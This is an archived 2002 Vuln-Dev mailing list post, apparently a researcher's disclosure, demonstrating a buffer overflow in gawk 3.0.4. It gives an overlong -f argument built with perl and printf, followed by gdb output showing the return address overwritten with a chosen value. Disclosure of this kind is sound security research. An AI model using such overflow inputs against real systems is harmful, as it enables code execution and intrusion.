VULN-DEV ARCHIVE

[ Message Index ] [ Thread Index ]	[ Reply ]
[ prev Msg by Date ]	[ next Msg by Date ]

To:  Vuln-Dev Subject:  RE: Buffer overflow in awk Date:  Mar 15 2002 9:20PM Author:  dong-h0un U <xploit hackermail com> Message-ID:  <20020315212018.28661.qmail@hackermail.com>

This puts last 'NULL byte' and change rule of program. Pico editer or snmpd did exploit by similar method. [x82@xpl017elz x82]$ gdb -q awk (no debugging symbols found)...(gdb) r -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x82\x82"` Starting program: /bin/awk -f `perl -e 'print "\x82" x 8173'; printf "\xb0\xba\x 82\x82"` Program received signal SIGSEGV, Segmentation fault. 0x8282bab0 in ?? () (gdb) q The program is running. Exit anyway? (y or n) y [x82@xpl017elz x82]$ rpm -qa | grep awk gawk-3.0.4-1 [x82@xpl017elz x82]$ debugging: (gdb) ... 0xbfffd2b0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2c0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2d0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2e0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd2f0: 0x82828282 0x82828282 0x82828282 0x82828282 0xbfffd300: 0x82828282 0x8282bab0 0xbfffd300 0x080538cc ~~ <- it's 0xbfffd310: 0xbfffdd46 0xbfffd390 0x080577e6 0xbfffdd46 0xbfffd320: 0xfffffffa 0x00000000 0x00000000 0x00000000 (gdb) x 0xbfffd304 0xbfffd304: 0x8282bab0 (gdb) fun! Sorry, I do not English. :-X -- by "you dong-hun"(Xpl017Elz), <szoahc hotmail com> -- Powered by Outblaze